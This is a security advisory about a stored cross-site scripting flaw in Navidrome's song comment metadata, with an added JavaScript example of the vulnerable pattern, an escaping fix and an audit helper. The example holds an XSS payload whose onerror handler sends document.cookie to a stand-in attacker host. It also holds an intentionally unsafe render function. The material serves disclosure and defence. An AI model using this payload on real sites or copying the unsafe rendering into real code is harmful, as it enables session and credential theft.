GHSA-rh3r-8pxm-hg4w: Navidrome has XSS via comment from song metadata
A stored cross-site scripting (XSS) vulnerability in the Navidrome web frontend allows an attacker to inject script through the comment metadata tag of a song; when the comment is rendered for another user, the injected code runs in that user's browser and can exfiltrate their credentials.
Exploitation requires that the attacker's maliciously crafted song first be added to the Navidrome library, so the issue is reachable by anyone who can get a file into the music collection that Navidrome indexes.
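The following is an added example, not Navidrome's own code, showing the general pattern behind this class of bug: a metadata field that is interpolated into markup becomes stored XSS, while the same field rendered as escaped text is inert. The `maliciousSong` object, the `attacker.example` host and the function names are constructed for illustration; they are not taken from the advisory.

```javascript
// Added example (not Navidrome code): a song comment rendered as HTML becomes
// stored XSS; rendered as escaped text it is harmless.

// Constructed song record. The comment carries a tag whose onerror handler runs
// when the bogus image fails to load and posts the cookie to an attacker host.
const maliciousSong = {
  title: 'Track 01',
  comment: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable pattern (assumed, for illustration): the tag value is dropped
// straight into markup, so the browser parses it as HTML.
function renderCommentUnsafe(song) {
  return `<div class="comment">${song.comment}</div>`;
}

// Minimal HTML escaper for the five characters that can break out of text
// content or a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Hardened pattern: the comment is treated as text, never as markup.
function renderCommentSafe(song) {
  return `<div class="comment">${escapeHtml(song.comment)}</div>`;
}

// Audit helper for an existing library: flag comments that contain markup or
// script-like fragments, since a legitimate tag value has no reason to.
function findSuspiciousComments(songs) {
  const markup = /<\s*\/?\s*[a-z][^>]*>|javascript:|\bon\w+\s*=/i;
  return songs.filter((s) => markup.test(s.comment || ''));
}

// Stand-alone demonstration.
console.log('unsafe :', renderCommentUnsafe(maliciousSong));
console.log('safe   :', renderCommentSafe(maliciousSong));
console.log('flagged:', findSuspiciousComments([maliciousSong, { title: 'T2', comment: 'Great album' }]).length);
```

In a React frontend, values placed as JSX children are escaped automatically; the risk arises only where a value is turned into markup, for instance through `dangerouslySetInnerHTML` or by building HTML strings by hand. Escaping at the render site is the fix; the audit helper is only a triage aid for finding already-ingested payloads, and a restrictive Content-Security-Policy reduces what an injected script can do but does not remove the bug.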